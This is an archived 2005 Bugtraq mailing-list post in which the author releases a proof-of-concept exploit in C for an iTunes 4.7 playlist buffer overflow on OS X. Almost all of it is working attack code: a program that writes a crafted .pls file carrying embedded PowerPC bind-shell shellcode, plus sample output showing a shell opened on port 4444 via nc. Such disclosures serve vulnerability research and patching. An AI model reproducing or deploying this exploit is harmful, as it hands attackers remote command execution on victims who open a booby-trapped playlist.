lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Sat, 15 Jan 2005 07:28:43 -0800
From: nemo@...inemenace.org
To: bugtraq@...urityfocus.com, vulnwatch@...nwatch.org
Subject: iDefense iTunes advisory.


Hey Everyone,

I've written a proof of concept for the iTunes 4.7 advisory released by iDefense 
on January 13, 2005.

Here is some code to exploit the vulnerability, it will generate a *.pls file which,when opened with iTunes 4.7 will bind a shell on port 4444.

- nemo

<------------------ fm-eyetewnz.c -------------------------->

/*
 * PoC for iTunes on OS X 10.3.7 
 * -( nemo@...inemenace.org )-
 * 
 * Generates a .pls file, when loaded in iTunes it 
 * binds a shell to port 4444. 
 * Shellcode contains no \x00 or \x0a's.
 *
 * sample output:
 *
 * -[nemo@gir:~]$ ./fm-eyetewnz foo.pls
 * -( fm-eyetewnz )-
 * -( nemo@...inemenace.org )-
 * Creating file: foo.pls.
 * Bindshell on port: 4444
 * -[nemo@gir:~]$  open foo.pls
 * -[nemo@gir:~]$  nc localhost 4444
 * id
 * uid=501(nemo) gid=501(nemo) groups=501(nemo)
 * 
 * Thanks to andrewg, mercy and core.
 * Greetings to pulltheplug and felinemenace.
 *
 * -( need a challenge? )-
 * -( http://pulltheplug.org )-
 */

#include <stdio.h>
#include <strings.h>

#define BUFSIZE 1598 + 4

char shellcode[] = /* large ugly shellcode generated by http://metasploit.com */
"\x7c\xa5\x2a\x79\x40\x82\xff\xfd\x7f\xe8\x02\xa6\x3b\xff\x07\xfa"
"\x38\xa5\xf8\x4a\x3c\xc0\xee\x83\x60\xc6\xb7\xfb\x38\x85\x07\xee"
"\x7c\x89\x03\xa6\x80\x9f\xf8\x4a\x7c\x84\x32\x78\x90\x9f\xf8\x4a"
"\x7c\x05\xf8\xac\x7c\xff\x04\xac\x7c\x05\xff\xac\x3b\xc5\x07\xba"
"\x7f\xff\xf2\x15\x42\x20\xff\xe0\x4c\xff\x01\x2c\xd6\xe3\xb7\xf9"
"\xd6\x03\xb7\xfa\xd6\x23\xb7\xfd\xd6\x83\xb7\x9a\xaa\x83\xb7\xf9"
"\x92\x83\xb5\x83\x92\xfd\xac\x83\xa6\x83\xb7\xf6\xee\x81\xa6\xa7"
"\xee\x83\xb7\xfb\x92\x0b\xb5\x5d\xd6\x23\xb7\xeb\xd6\x83\xb7\x93"
"\x91\x40\x44\x83\xaa\x83\xb7\xf9\x92\x83\xb5\x83\xd6\x83\xb7\x91"
"\x91\x40\x44\x83\xaa\x83\xb7\xf9\x92\x83\xb5\x83\x91\x40\x44\x83"
"\xd6\x83\xb7\xe5\xd6\x03\xb7\xeb\x7e\x02\x48\x13\xd6\x22\x48\x13"
"\xd6\x02\x48\x0b\xaa\x83\xb7\xf9\x92\x83\xb5\x83\x92\xfd\xac\x83"
"\xd6\x23\xb7\xf9\xd6\x83\xb7\xa1\x91\x40\x44\x83\x92\x27\x9c\x83"
"\xaa\x83\xb7\xf9\x92\x83\xb5\x83\xd6\x26\x48\x04\xc2\x86\x48\x04"
"\xae\x01\x48\x1e\xd6\x83\xb7\xb9\xaa\x83\xb7\xf9\x92\x83\xb5\x83"
"\x92\x26\x9d\x82\xae\x01\x48\x06\x92\xeb\xb5\x5d\xd6\xe0\xb7\xd3"
"\x7e\xe2\x48\x03\x7e\x22\x48\x07\xd6\x02\x48\x03\xd6\x83\xb7\xc0"
"\x92\x83\xb3\x57\xaa\x83\xb7\xf9\x92\x83\xb5\x83\x91\x63\xb7\xf3"
"\xc1\xe1\xde\x95\xc1\xe0\xc4\x93\xee\x83\xb7\xfb";

int main(int ac, char **av)
{
	int n,*p;
	unsigned char * q;
	char buf[BUFSIZE];
	FILE *pls;
	int offset=0x3DA8;
	char playlist[] = { 
		"[playlist]\n"                                                    
		"NumberOfEntries=1\n"                                             
		"File1=http://"
	};
	printf("-( fm-eyetewnz )-\n");
	printf("-( nemo@...inemenace.org )-\n");
	memset(buf,'\x60',BUFSIZE);
	bcopy(shellcode, buf + (BUFSIZE - 44 - sizeof(shellcode)),sizeof(shellcode) - 1); // avoid mangled stack.
	q = buf + sizeof(buf) - 5;
	p = (int *)q; 
	if(!(av[1])) {
		printf("usage: %s <filename (.pls)> [offset]\n",*av);
		exit(1);
	}
	if(av[2])
		offset = atoi(av[2]);
	*p = (0xc0000000 - offset);//	 0xbfffc258;
	if(!(pls = fopen(*(av+1),"w+"))) {
		printf("error opening file: %s.\n", *(av +1));
		exit(1);
	}
	printf("Creating file: %s.\n",*(av+1));
	printf("Bindshell on port: 4444\n");
	fwrite(playlist,sizeof(playlist) - 1,1,pls);	
	fwrite(buf,sizeof(buf) - 1,1,pls);	
	fclose(pls);
}



Powered by blists - more mailing lists